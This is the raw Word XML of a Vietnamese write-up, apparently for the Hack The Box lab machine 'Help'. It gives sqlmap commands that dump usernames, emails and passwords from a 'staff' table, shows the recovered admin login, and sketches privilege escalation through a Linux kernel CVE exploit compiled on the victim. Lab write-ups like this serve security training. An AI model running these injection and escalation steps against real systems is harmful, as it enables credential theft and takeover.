          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>công cụ sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C641E44" w14:textId="07EA02FA" w:rsidR="009B0D43" w:rsidRDefault="009B0D43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF60836" w14:textId="0E744F2F" w:rsidR="00FA3651" w:rsidRPr="003332BF" w:rsidRDefault="009B0D43">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003332BF">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap -u "http://help.htb/support/?v=view_tickets&amp;action=ticket&amp;param[]=8&amp;param[]=attachment&amp;param[]=5&amp;param[]=10" --headers="Cookie: lang=english; PHPSESSID=s8kubq3u6ad8fcs6g24is56mn4; usrhash=0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BGJZiW8Yvx6uSvtrnUkKbFa1Re85Sm%2F%2FeJ4M6e%2BbFZWCg%3D%3D"   --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0E6C02" w14:textId="07524978" w:rsidR="00400B40" w:rsidRDefault="00400B40">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD931AB" w14:textId="5701EF70" w:rsidR="00400B40" w:rsidRDefault="00400B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cơ sở dữ liệu là support, bảng chứa dữ liệu nhạy cảm là staff (xem CVE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B79CD" w14:textId="6A8C6657" w:rsidR="00400B40" w:rsidRDefault="00400B40">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C70ABBE" w14:textId="13988FB6" w:rsidR="00FA3651" w:rsidRDefault="00400B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Thêm cho mình tùy chọn sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="00400B40">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">--threads=10 -D support -T staff </w:t>
      </w:r>
      <w:r w:rsidR="00477B07">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-C username,</w:t>
      </w:r>
      <w:r w:rsidR="007227B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>email,</w:t>
      </w:r>
      <w:r w:rsidR="00477B07">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r w:rsidRPr="00400B40">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0880A167" w14:textId="49BC92B5" w:rsidR="00477B07" w:rsidRDefault="00477B07">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FA6575" w14:textId="3E9284C7" w:rsidR="0008155B" w:rsidRDefault="003332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Truy suất được thông tin đăng nhập của admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5574CAA3" w14:textId="15FCA980" w:rsidR="0008155B" w:rsidRDefault="00C3209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DDAFFD" wp14:editId="14C40222">
            <wp:extent cx="5943600" cy="1146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59DC" w14:textId="172715E8" w:rsidR="00C32093" w:rsidRDefault="00C32093">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5180159C" w14:textId="73673053" w:rsidR="00C32093" w:rsidRDefault="00C32093">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32093">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>support@mysite.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Welcome1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5D736" w14:textId="530E2495" w:rsidR="004E0731" w:rsidRDefault="004E0731">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609E4C88" w14:textId="7E2094C1" w:rsidR="004E0731" w:rsidRDefault="004E07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cần đoán tên người dùng kết nối dịch vụ SSH: help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7B184" w14:textId="3361E31B" w:rsidR="00A67F43" w:rsidRDefault="00A67F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D524798" w14:textId="4503003D" w:rsidR="00A67F43" w:rsidRPr="00A67F43" w:rsidRDefault="00A67F43">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A67F43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B46EE1" w14:textId="560E97D6" w:rsidR="004E0731" w:rsidRDefault="004E0731">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E3CE61" w14:textId="3EEB24F2" w:rsidR="004E0731" w:rsidRDefault="00E103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51C353" wp14:editId="365A3D37">
            <wp:extent cx="5943600" cy="2148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452" w14:textId="1A0B42C3" w:rsidR="00B3229A" w:rsidRDefault="00B3229A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0CE591" w14:textId="652875CE" w:rsidR="00B3229A" w:rsidRDefault="002470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154752" wp14:editId="758728EF">
            <wp:extent cx="3314700" cy="86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F98" w14:textId="3D5DE9AC" w:rsidR="00955D1A" w:rsidRDefault="00955D1A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DA32BD" w14:textId="059DE35F" w:rsidR="00955D1A" w:rsidRDefault="00955D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Khai thác nhân Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28803C12" w14:textId="78767615" w:rsidR="00955D1A" w:rsidRDefault="00955D1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9D0BC5" wp14:editId="33AE3617">
            <wp:extent cx="5943600" cy="424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CB9B" w14:textId="2A6E738C" w:rsidR="002470DD" w:rsidRDefault="002470DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A537914" w14:textId="19D4FDD8" w:rsidR="00794458" w:rsidRDefault="004333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trên google phiên bản của Linux, nó sẽ trả về 1 CVE giúp leo thang đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1B01B1" w14:textId="761C9BF2" w:rsidR="004333D6" w:rsidRDefault="004333D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4297790B" w14:textId="6FBA5A85" w:rsidR="004333D6" w:rsidRDefault="004333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 máy mình và máy nạn nhân không chung nhân của Linux nên biên dịch cục bộ sẽ không chạy được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F9102" w14:textId="4ADADAC2" w:rsidR="004333D6" w:rsidRDefault="004333D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490726EF" w14:textId="6054169C" w:rsidR="004333D6" w:rsidRDefault="004333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sẽ vận chuyển khai thác đến máy nạn nhân rồi mới biên dịch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57996A" w14:textId="77777777" w:rsidR="004333D6" w:rsidRDefault="004333D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DEF481" w14:textId="5E0DE595" w:rsidR="002470DD" w:rsidRDefault="00121C3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55E9D1" wp14:editId="28303FD7">
            <wp:extent cx="5943600" cy="2719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7419" w14:textId="28CBBD4C" w:rsidR="00121C31" w:rsidRDefault="00121C31">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B29DAC3" w14:textId="77777777" w:rsidR="00121C31" w:rsidRPr="00EC135B" w:rsidRDefault="00121C31">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00121C31" w:rsidRPr="00EC13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48"/>
    <w:rsid w:val="000018B6"/>
    <w:rsid w:val="00025CB8"/>
    <w:rsid w:val="00037949"/>
    <w:rsid w:val="0008155B"/>
    <w:rsid w:val="000A10DC"/>
    <w:rsid w:val="000A1CD6"/>
    <w:rsid w:val="000E0471"/>
    <w:rsid w:val="00121C31"/>
    <w:rsid w:val="00156B18"/>
    <w:rsid w:val="00167233"/>
    <w:rsid w:val="00216533"/>
    <w:rsid w:val="00222BBC"/>
    <w:rsid w:val="002470DD"/>
    <w:rsid w:val="00250748"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003332BF"/>
    <w:rsid w:val="003442C4"/>
    <w:rsid w:val="00390564"/>
    <w:rsid w:val="00400B40"/>
    <w:rsid w:val="00424C83"/>
    <w:rsid w:val="004333D6"/>
    <w:rsid w:val="00477B07"/>
    <w:rsid w:val="004E0731"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00645561"/>
    <w:rsid w:val="00682521"/>
    <w:rsid w:val="007227B5"/>
    <w:rsid w:val="007733D6"/>
    <w:rsid w:val="007907EA"/>
    <w:rsid w:val="00794458"/>
    <w:rsid w:val="007A41D1"/>
    <w:rsid w:val="007C140D"/>
    <w:rsid w:val="00834672"/>
    <w:rsid w:val="008C2317"/>
    <w:rsid w:val="008D61BA"/>
    <w:rsid w:val="00955D1A"/>
    <w:rsid w:val="00956914"/>
    <w:rsid w:val="009B0D43"/>
    <w:rsid w:val="009D713C"/>
    <w:rsid w:val="00A24859"/>
    <w:rsid w:val="00A67F43"/>
    <w:rsid w:val="00A71CAA"/>
    <w:rsid w:val="00AC7DC4"/>
    <w:rsid w:val="00AD591E"/>
    <w:rsid w:val="00B3229A"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C32093"/>
    <w:rsid w:val="00D60CA5"/>
    <w:rsid w:val="00D8691E"/>
    <w:rsid w:val="00DC4F72"/>
    <w:rsid w:val="00E10344"/>
    <w:rsid w:val="00EA1CF5"/>
    <w:rsid w:val="00EB1F93"/>
    <w:rsid w:val="00EC135B"/>
    <w:rsid w:val="00EC4118"/>
    <w:rsid w:val="00F970BD"/>
    <w:rsid w:val="00FA3651"/>
    <w:rsid w:val="00FA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A75DBD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{233747D1-99A5-CE42-AFD7-2C5B4E791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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-10T08:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-10T14:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>